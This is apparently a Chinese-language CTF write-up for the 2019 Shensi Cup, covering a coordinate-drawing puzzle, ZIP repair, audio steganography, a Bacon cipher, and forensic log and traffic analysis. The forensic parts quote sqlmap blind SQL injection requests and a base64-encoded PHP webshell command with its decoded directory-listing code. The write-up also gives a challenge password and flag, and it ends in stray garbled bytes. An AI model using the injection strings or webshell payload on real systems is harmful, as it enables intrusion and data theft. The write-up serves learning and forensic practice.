2019深思杯

上下左右

flag.txt:

DDDDDDDDDRRRRRRDDDDDDDDDDDDDDDDLLLDDDDDDDDDDDLLRRRRLLDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUURRRRRRRUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDUUUUUUUUUUUUUUUUUUUURRRRRRRRUUUUUUUUUUULLLLLRRRRRRLDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLUUUUUUUUUUUUUURRRRUUUUURRRRRUUUUUUUUUUURRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLUUUUUUUUUUUUUUUUUUUDDDDDDDDDDDDDDDDDDDRRRRRRLDDDDDDDDDDDDDLLLLLLLRRRRRRRRLUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUURRRRRUUUUUUUUUUUUUUUUURRLLDDDDDDDDDDDDDDDDDDDDDDLLDDDDRRDDDDDDDDDDDDDDDDDDDDDDDRRLLUUUUUUUUUUUUUUUUUUUUUUULLUUUURRUUUUURRRRRRRRUUUUUUUUUUULLLLLRRRRRRLDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLUUUUUUUUUUUUUURRRRUUUUURRRRDDDDDDDDDDDDDDDDDDDDDDRRRRRLLLLLUUUUUUUUUUUUUUUUUUUUUURRRRRUUUUUUUUUUUUUUUULLLLLRRRRRDDDDDDDDDDDDDDDDRRRUUUUUUUUUUUUUUUURRRRLLLLDDDDDDDDDDDDDDDDRRRRDDDDDDDDDDDDDDDDDDDDDDLLLLRRRRUUUUUUUUUUUUUUUUUUUUUURRRRRUUUUUUUUUUUUUUUURRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLUUUUUUUUUUUUUUUUUUUUUURRRRRRRRRRRRUUUUUUUUUUUUUUUULLLLLRRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLRRRRRUUUUUUUUUUUUUUUUUUUUUURRRRRRRUUUUUUUUUUUUUUUULLLLLRRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLRRRRRUUUUUUUUUUUUUUUUUUUUUURRUUUUUUUUUUUUUUUURRRRRDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDLLLLLUUUUUUUUUUUUUUUUUUUUUURRRRRRRRRRUUUUUUUUUUUUUUUUUUUUULLLRRRDDDDDDDDDDDDDDDDDDDDDDDDRRDDDDLLDDDDDDDDDDDDDDDDDDDDLLL

crack.py:

# encoding: utf-8
from PIL import Image
im = Image.new('RGB',(1000,1000),'black')
 #把flag中的字母读出来
file = open('flag.txt')
line = file.readline()
a = [300,300] #起始位置
#把flag[0]当做左右移动 flag[1]当做上下移动
for i in line:
    if i == 'D':
        a[1] = a[1]+1
    if i == 'U':
        a[1] = a[1]-1
    if i == 'R':
        a[0] = a[0]+1
    if i == 'L':
        a[0] = a[0]-1
    im.putpixel(a ,(255,255,255)) ## putpixel是通过坐标点来进行画图
##刚开始是按照惯例 让i == 'u' +1 画出来是个倒立的图形 所以只能让 ‘D'+1
im.show()

​

压缩包的秘密

直接打开压缩包

查看16进制:

0000000 504b 0304 1400 0900 0800 d772 554f 9f43
0000010 ce46 3400 0000 2600 0000 0800 0000 666c
0000020 6167 2e74 7874 1cc2 f91a 0f38 037f 62c9
0000030 3bf5 1bed 8553 59ca 7052 4df3 257c 8f4b
0000040 2ac9 a176 c915 0098 aaef bf55 4f06 e3f3
0000050 7c7e 43f8 67e7 dbb1 3a81 504b 0708 9f43
0000060 ce46 3400 0000 2600 0000 504b 0102 1f00
0000070 1400 0900 0800 d772 554f 9f43 ce46 3400
0000080 0000 2600 0000 0800 2400 0000 0000 0000
0000090 2000 0000 0000 0000 666c 6167 2e74 7874
00000a0 0a00 2000 0000 0000 0100 1800 b944 f3f4
00000b0 d787 d501 0439 16c2 5185 d501 0439 16c2
00000c0 5185 d501 504b 0506 0000 0000 0100 0100
00000d0 5a00 0000 6a00 0000 8000 090d 0a20 2020
00000e0 200d 0a20 0d0a 2009 200d 0a20 0d0a 0920
00000f0 2020 2009 0d0a 2020 0d0a 2020 200d 0a09
0000100 2020 2020 090d 0a20 2020 200d 0a20 090d
0000110 0a20 0920 200d 0a20 2009 200d 0a09 2020
0000120 2020 090d 0a20 0909 200d 0a20 0909 0d0a
0000130 0920 200d 0a09 2020 2020 090d 0a20 2020
0000140 0d0a 0920 200d 0a09 200d 0a20 200d 0a20
0000150 2020 0d0a 0920 0920 0d0a 6447 686c 636d
0000160 5574 6158 4d74 6147 4673 5a69 3177 6432
0000170 5174 6332 686c 626e 4e70               
000017a

发现两个字节位置不对,写脚本交换两字节位置,恢复压缩包

S='4B50040300140009000872D74F55439F46CE0034000000260000000800006C666761742E7478C21C1AF9380F7F03C962F53BED1B5385CA595270F34D7C254B8FC92A76A115C99800EFAA55BF064FF3E37E7CF843E767B1DB813A4B500807439F46CE00340000002600004B500201001F00140009000872D74F55439F46CE00340000002600000008002400000000000000200000000000006C666761742E7478000A0020000000000001001844B9F4F387D701D53904C216855101D53904C216855101D54B5006050000000000010001005A0000006A000000800D09200A20200D20200A0A0D09200D20200A0A0D2009202009200A0D20200A0D20200D20090A202020200D09200A20200D20200A0D09200A20090D20200A09200D20090A202020200D09200A09090D20200A09090A0D20090D20090A202020200D09200A20200A0D20090D20090A0D20200A0D20200A20200A0D200920090A0D47646C686D6374555861744D47617346695A77313264745132636C686E62704E'
s1=''
for i in range(int(len(S)/4)):
	s1+=S[4*i+2]
	s1+=S[4*i+3]
	s1+=S[4*i]
	s1+=S[4*i+1]
print(s1)

解压压缩包发现里面有一个加密的flag.txt

在查看16进制，发现底部有base64编码，解码后提示一半的密码，shensi，不过这一半的密码… 是后6位密码，并不是前6位（巨坑！），接下来可以掩码爆破，也可以猜测出来…密码:sdniscshensi

flag{5b3fcbb6920490bf4ab156df51c0976c}

我和我的祖国

音频分析发现信息隐藏在最后

下面的是0，上面是1

查看16进制:

F0D8 --> 1

1027 --> 0

解题脚本:

# encoding= utf-8
f=open('flag.wav','rb+')
data=f.read()
print type(data)
strflag=""
flag=""
#w=open('flag01.txt','w')
#w.write('0')
# 0x362e4c为隐藏信息的开头偏移地址
for i in range(0x362e4c,len(data),2):
    if data[i]=='\xf0':
        strflag+='0'
        #print 0
        #w.write('0')
    elif data[i]=='\x10':
        strflag+='1'
        #print 1
        #w.write('1')
        
f.close()
#w.close()
print strflag
for i in range(0,len(strflag),8):
    chra=int(strflag[i:i+8],2)
    flag+=chr(chra)

print flag

Forensic-日志分析

192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E96%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E112%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E104%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E100%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E102%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C1%2C1%29%29%3E101%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E96%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E112%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E104%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E108%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 215 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E106%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"
192.168.117.1 - - [08/Oct/2019:14:02:12 +0800] "GET /admin/?id=1%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28flag%20AS%20CHAR%29%2C0x20%29%20FROM%20dvwa.flag%20ORDER%20BY%20flag%20LIMIT%200%2C1%29%2C2%2C1%29%29%3E107%20AND%20%27ZeOx%27%3D%27ZeOx HTTP/1.1" 200 209 "-" "sqlmap/1.3.10.7#dev (http://sqlmap.org)"

二分注入

简单的密码

hellO，everyone Are YOU huNGrY woUld you like To eAt BAcon

培根密码

有两种解密模式:

1. 小写字母转为a , 大写字母转为b
2. 小写字母转为A , 大写字母转为B

#encoding=utf-8
import re
raw="hellOeveryoneAreYOUhuNGrYwoUldyoulikeToeAtBAcon"

print(raw)
print '小写字母转为a , 大写字母转为b: '
To_a=re.sub(r'[a-z]','a',raw)
To_b=re.sub(r'[A-Z]','b',To_a)

print(To_b)


print '小写字母转为A , 大写字母转为B'
To_A=re.sub(r'[A-Z]','B',raw)
To_B=re.sub(r'[a-z]','A',To_A)
print(To_B)

# sub，替换匹配成功的指定位置字符串
#sub(pattern, repl, string, count=0, flags=0)
# pattern： 正则模型
# repl   ： 要替换的字符串或可执行对象
# string ： 要匹配的字符串
# count  ： 指定匹配个数
# flags  ： 匹配模式　

letters1 = [
    'A', 'B', 'C', 'D', 'E', 'F', 'G',
    'H', 'I', 'J', 'K', 'L', 'M', 'N',
    'O', 'P', 'Q', 'R', 'S', 'T',
    'U', 'V', 'W', 'X', 'Y', 'Z',
]
letters2 = [
    'a', 'b', 'c', 'd', 'e', 'f', 'g',
    'h', 'i', 'j', 'k', 'l', 'm', 'n',
    'o', 'p', 'q', 'r', 's', 't',
    'u', 'v', 'w', 'x', 'y', 'z',
]
cipher1 = [
    "aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba",
    "aabbb", "abaaa", "abaab", "ababa", "ababb", "abbaa", "abbab",
    "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb",
    "babaa", "babab", "babba", "babbb", "bbaaa", "bbaab",
]
cipher2 = [
    "AAAAA", "AAAAB", "AAABA", "AAABB", "AABAA", "AABAB", "AABBA",
    "AABBB", "ABAAA", "ABAAA", "ABAAB", "ABABA", "ABABB", "ABBAA",
    "ABBAB", "ABBBA", "ABBBB", "BAAAA", "BAAAB", "BAABA",
    "BAABB", "BAABB", "BABAA", "BABAB", "BABBA", "BABBB",
]


def bacon1(string):
    lists = []
    # 分割，五个一组
    for i in range(0, len(string), 5):
        lists.append(string[i:i+5])
    # print(lists)
    # 循环匹配，得到下标，对应下标即可
    for i in range(0, len(lists)):
        for j in range(0, 26):
            if lists[i] == cipher1[j]:
                # print(j)
                print(letters1[j], end="")
    print("")


def bacon2(string):
    lists = []
    # 分割，五个一组
    for i in range(0, len(string), 5):
        lists.append(string[i:i+5])
    # print(lists)
    # 循环匹配，得到下标，对应下标即可
    for i in range(0, len(lists)):
        for j in range(0, 26):
            if lists[i] == cipher2[j]:
                # print(j)
                print(letters2[j], end="")
    print("")



if __name__ == "__main__":
    bcon1=input('ab 输入: ')
    bacon1(bcon1)
    bcon2=input('AB 输入: ')
    bacon2(bcon2)

import re
# 培根加密有两种
class Baconian():
    alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u',
                'v', 'w', 'x', 'y', 'z']
    first_cipher = ["aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba", "aabbb", "abaaa", "abaab", "ababa",
                    "ababb", "abbaa", "abbab", "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb", "babaa", "babab",
                    "babba", "babbb", "bbaaa", "bbaab"]
    second_cipher = ["aaaaa", "aaaab", "aaaba", "aaabb", "aabaa", "aabab", "aabba", "aabbb", "abaaa", "abaaa", "abaab",
                     "ababa", "ababb", "abbaa", "abbab", "abbba", "abbbb", "baaaa", "baaab", "baaba", "baabb", "baabb",
                     "babaa", "babab", "babba", "babbb"]
    def __init__(self, str):
        self.str = str
    def decode(self):
        str = self.str.lower()
        str_array = re.findall(".{5}", str)
        decode_str1 = ""
        decode_str2 = ""
        for key in str_array:
            for i in range(0,26):
                if key == Baconian.first_cipher[i]:
                    decode_str1 += Baconian.alphabet[i]
                if key == Baconian.second_cipher[i]:
                    decode_str2 += Baconian.alphabet[i]
        print(decode_str1)
        print(decode_str2)
if __name__ == '__main__':
    str = 'aaaabaaaaaaaabaabbbaabbabaabaaaaaaabaababbaaa'
    bacon = Baconian(str)
    bacon.decode()

流量分析

查看一下http流,发现非常多的http请求,看得出是在进行目录爆破,那就查看哪个目录爆破成功,爆破成功返回200，但是流太多，所以先搜了一下可疑内容http contains "cmd" 然后打开搜寻出现的流量，过滤掉一些无用的流量后，在tcp.stream eq 76发现了一个请求成功的php: cmd.php，直接过滤掉请求失败的http contains "200"在tcp.stream eq 1128看到了命令执行过程:

tcp.stream eq 1354

unicode解码看一下:

>>> from urllib import parse
>>> parse.unquote(r'sdnisc=%40eval%01%28base64_decode%28%24_POST%5Bz0%5D%29%29%3B&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=L3Zhci93d3cvaHRtbC8%3D')
'sdnisc=@eval\x01(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0+fCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=L3Zhci93d3cvaHRtbC8='

将z0的内容解码并排版:

@ini_set("display_errors","0");
@set_time_limit(0);
@set_magic_quotes_runtime(0);
echo("->|");
;
$D=base64_decode($_POST["z1"]);
$F=@opendir($D);
if($F==NULL) {
	echo("ERROR:// Path Not Found Or No Permission!");
} else {
	$M=NULL;
	$L=NULL;
	while($N=@readdir($F)) { //遍历目录文件
		$P=$D."/".$N;
		$T=@date("Y-m-d H:i:s",@filemtime($P));
		@$E=substr(base_convert(@fileperms($P),10,8),-4); //查看文件名称和权限
		$R="\t".$T."\t".@filesize($P)."\t".$E."
";
		if(@is_dir($P))$M.=$N."/".$R; else $L.=$N.$R;
	}
	echo $M.$L;
	@closedir($F);
}
;
echo("|<-");
die();
�R�f"�wwr��F��